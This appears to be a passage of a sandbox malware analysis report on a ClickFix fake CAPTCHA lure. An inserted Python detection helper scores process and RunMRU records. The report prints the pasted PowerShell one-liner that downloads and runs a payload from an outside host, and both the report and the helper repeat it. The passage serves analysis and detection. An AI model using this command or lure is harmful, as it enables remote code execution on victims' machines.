Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll (7 identical entries)
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Data Obfuscation

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))" (2 identical entries)
Source: Yara match File source: 00000014.00000002.2164204062.0000000008540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Persistence and Installation Behavior

barindex
Source: screenshot OCR Text: x e about:blank X Verify You Are Human C escooterzone.com/play.html Verify You Are Human Please verify that you are a human to continue. I'm not a robot Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter 15:03 ENG p type here to search SG 15/01/2025
Source: screenshot OCR Text: x e about:blank X Verify You Are Human C escooterzone.com/play.html Verify You Are Human Please verify that you are a human to continue. I'm not a robot Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter 15:04 ENG p Type here to search SG 15/01/2025
Source: screenshot OCR Text: x e about:blank X Verify You Are Human escooterzone.com/play.html Verify You Are Human Please verify that you are a human to continue. I'm not a robot Undo Cut Copy Verification Paste Steps Select All 1. Press Windows Right to left Reading order Run Button Show Unicode control characters Insert Unicode control character 2. Press CTRL + V Type the resource, open IME 3. Press Enter Reconversion Open: 15:04 ENG p Type here to search SG 15/01/2025
Source: Chrome DOM: 1.1 OCR Text: Verify You Are Human Please verify that you are a human to continue. I'm not a robot Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter
Source: screenshot OCR Text: x e about:blank X Verify You Are Human escooterzone.com/play.html Verify You Are Human Please verify that you are a human to continue. I'm not a robot Verification Steps 1. Press Windows x Run Button 2. Press CTRL + V Type the name of a program, folder, document or Internet resource and Windows will open it for you. 3. Press Enter Open: OK 15:03 ENG p Type here to search SG 15/01/2025
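The lure steps in the screenshots above (Windows key, CTRL+V, Enter) and the pasted command recorded under Data Obfuscation (powershell -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString(...))") are the two halves of the ClickFix chain: the page seeds the clipboard, the victim pastes into the Run dialog, and the one-liner pulls the next stage over HTTPS and runs it in memory without touching disk. Two artefacts survive that chain on the endpoint: the process-creation record (the shell is a child of explorer.exe when launched from Win+R, or of mshta.exe when the pasted text was an HTA URL) and the Run dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, where Windows keeps the typed text with a trailing "\1". The following Python is an added detection helper written for this page; it is not part of the Joe Sandbox report or of the sample. It scores process-creation records (field names modelled on Sysmon Event ID 1) and RunMRU values against the indicators from that command line. The first sample record replays the process creation recorded in this report; the other records, the RunMRU dump, the indicator weights and the threshold are constructed assumptions.

```python
import re
from dataclasses import dataclass

# Command-line indicators. The first six mirror the cradle recorded in this
# report (-w hidden -ep bypass -nop ... iex((...WebClient).DownloadString(...)));
# the download list is widened to the usual PowerShell equivalents.
INDICATORS = {
    "hidden_window":      re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden\b"),
    "exec_policy_bypass": re.compile(r"(?i)(?:^|\s)-e(?:xecution)?p(?:olicy)?\s+bypass\b"),
    "no_profile":         re.compile(r"(?i)(?:^|\s)-nop(?:rofile)?\b"),
    "iex":                re.compile(r"(?i)\b(?:iex|invoke-expression)\b"),
    "download_cradle":    re.compile(r"(?i)\b(?:DownloadString|DownloadFile|DownloadData|"
                                     r"Invoke-WebRequest|iwr|Invoke-RestMethod|irm|curl|wget)\b"),
    "web_client":         re.compile(r"(?i)System\.Net\.WebClient"),
}
URL_RE = re.compile(r"""(?i)https?://[^\s'")]+""")

# Weights and threshold are this example's assumption, not a published rule.
WEIGHTS = {"hidden_window": 1, "exec_policy_bypass": 1, "no_profile": 1,
           "iex": 2, "download_cradle": 2, "web_client": 1}
LURE_PARENT_BONUS = 2     # shell spawned by explorer.exe (Win+R) or mshta.exe
MSHTA_REMOTE_BONUS = 3    # mshta.exe handed a URL: remote HTA execution
THRESHOLD = 5
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
LURE_PARENTS = {"explorer.exe", "mshta.exe"}


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (field names after Sysmon Event ID 1)."""
    image: str
    parent_image: str
    command_line: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_command_line(cmdline: str) -> tuple[int, list[str], list[str]]:
    """Return (score, matched indicator names, URLs found) for one command line."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    return sum(WEIGHTS[h] for h in hits), hits, URL_RE.findall(cmdline)


def classify(ev: ProcEvent) -> dict:
    """Score a process-creation record: command-line indicators plus launch context."""
    score, hits, urls = score_command_line(ev.command_line)
    image, parent = basename(ev.image), basename(ev.parent_image)
    if image in SHELLS and parent in LURE_PARENTS:
        score += LURE_PARENT_BONUS
        hits.append(f"lure_parent:{parent}")
    if image == "mshta.exe" and urls:
        score += MSHTA_REMOTE_BONUS
        hits.append("mshta_remote_url")
    return {"image": image, "parent": parent, "score": score,
            "hits": hits, "urls": urls, "suspicious": score >= THRESHOLD}


def scan_runmru(values: dict[str, str]) -> list[tuple[str, int, list[str]]]:
    """Score Win+R history. RunMRU values hold the typed text plus a trailing
    '\\1'; 'MRUList' is the ordering key and is skipped."""
    flagged = []
    for name, data in values.items():
        if name == "MRUList":
            continue
        cmd = data[:-2] if data.endswith("\\1") else data
        score, hits, _ = score_command_line(cmd)
        if score >= THRESHOLD:
            flagged.append((name, score, hits))
    return flagged


# Command line exactly as recorded in this report's "Process created" entry.
REPORT_CMDLINE = r'''"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))"'''

SAMPLE_EVENTS = [
    # 1: the process creation recorded in this report (paths from the report)
    ProcEvent(r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", REPORT_CMDLINE),
    # 2: constructed: a cradle pasted into Win+R, so explorer.exe is the parent
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              r'powershell -w hidden -ep bypass -c "iwr https://example.invalid/a.ps1 | iex"'),
    # 3: constructed benign admin one-liner launched from the Run dialog
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              r'powershell -NoProfile -Command "Get-Process | Out-File C:\temp\procs.txt"'),
    # 4: constructed: the mshta variant of the same lure (remote HTA from Win+R)
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
              r"mshta https://example.invalid/verify"),
]

SAMPLE_RUNMRU = {  # constructed registry dump of HKCU\...\Explorer\RunMRU
    "a": "notepad\\1",
    "b": "powershell -w hidden -ep bypass -nop -Command \"iex ((New-Object "
         "System.Net.WebClient).DownloadString('https://example.invalid/x.json'))\"\\1",
    "MRUList": "ba",
}

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        r = classify(ev)
        print(f"{'ALERT' if r['suspicious'] else 'ok   '} score={r['score']:<2} "
              f"{r['parent']} -> {r['image']} {r['hits']} {r['urls']}")
    for name, score, hits in scan_runmru(SAMPLE_RUNMRU):
        print(f"RunMRU value {name!r}: score={score} {hits}")
```

The command-line regexes alone are brittle: the same cradle can be rewritten with string concatenation, aliases, or -EncodedCommand and match none of them, which is why the launch context (a shell under explorer.exe or mshta.exe) and the RunMRU artefact carry their own weight here. RunMRU is also the piece to pull during triage, since it keeps the pasted text after the processes have exited.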
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: FirmwareTableInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1747
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7641
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2051
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7782
Source: C:\Windows\System32\svchost.exe TID: 4412 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6924 Thread sleep count: 1747 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6924 Thread sleep count: 7641 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6268 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7552 Thread sleep count: 2051 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7552 Thread sleep count: 7782 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7592 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1980 Thread sleep time: -90000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7312 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

HIPS / PFW / Operating System Protection Evasion

